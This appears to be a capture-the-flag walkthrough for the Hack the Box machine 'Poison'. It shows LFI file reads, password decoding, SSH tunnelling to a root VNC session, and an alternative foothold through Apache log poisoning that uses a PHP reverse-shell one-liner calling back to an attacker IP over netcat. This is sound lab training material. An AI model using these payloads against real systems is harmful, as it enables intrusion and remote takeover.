Hack the Box: Poison

Enumeration

Nmap

The Nmap scan shows that OpenSSH is running on port 22 and Apache server on port 80 on the target. The target has a FreeBSD operating system.

nmap -sVC 10.10.10.84

HTTP

Browsing the website, we can see a site with the title: “Temporary website to test local .php scripts”.

Entering a listed script’s name “listfiles.php” into the input field we are redirected to the URL: http://10.10.10.84/browse.php?file=listfiles.php. From the listed files we can see a file pwdbackup.txt.

Entering “pwdbackup.txt” into the “Scriptname” input field we can see a base64 encoded password that has been encoded 13 times.

We can write a simple bash script to decode it.

#!/bin/bash

# secret.txt contains encoded text
encoded_text=$(<secret.txt)

for ((i=1;i<=13;i++)); do
    encoded_text=$(echo "$encoded_text" | base64 -d)
done

echo "$encoded_text"

After running the script we get back a password: Charix!2#4%6&8(0

Tested if the web app is vulnerable to local file inclusion (LFI). And indeed we can see the content of the file /etc/passwd. From the file, we can see a user called charix who can log in to the target server.

curl "http://10.10.10.84/browse.php?file=/etc/passwd"

Foothold

Now we can straight SSH into Charix account with the password we found previously.

ssh charix@10.10.10.84

The user flag can be obtained from the directory: /home/charix.

Privilege Escalation

We can see that there is a secret.zip file in the home directory of user charix.

Transferred the file to the Kali Linux machine and successfully decompressed the file using Charix’s password.

From the file type, we can see that the file secret seems to be encoded.

root   529   0.0  0.9  23620  8868 v0- S    14:42     0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthorit

Running the command ps aux at the target machine we can see that there is a VNC process being run as root.

ps aux

Viewing the entire process information we can see that VNC is listening on port 5901 on localhost.

ps -auxww | grep vnc

We can verify that with the netstat command.

netstat -an | grep LISTEN

Forwarded port 5000 from the Kali Linux machine to the target machine’s port 5901 so we can access VNC from the attacker machine.

# ssh -L [local-port]:[remote-ip]:[remote-port]
ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84

Trying to access VNC from the Kali Linux machine we need a password. Charix’s password didn’t work.

vncviewer 127.0.0.1:5000

Using the -passwd flag for vncviewer and supplying the file secret we found earlier successfully gained a connection.

vncviewer 127.0.0.1:5000 -passwd secret

The root flag can be obtained from the directory: /root.

Other Method: Log Poisoning for Initial Foothold

Examining the FreeBSD log file /var/log/httpd-access.log we can see that the user agent is being logged.

curl "http://10.10.10.84/browse.php?file=/var/log/httpd-access.log"

Intercepted the request in Burp Suite and changed the user agent to a reverse shell.

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 443 >/tmp/f') ?>

Set up a listener to receive the reverse shell:

nc -lvnp 443

Send the request in Burp Suite and call the log file.

http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Received a shell in the Netcat listener as a user www.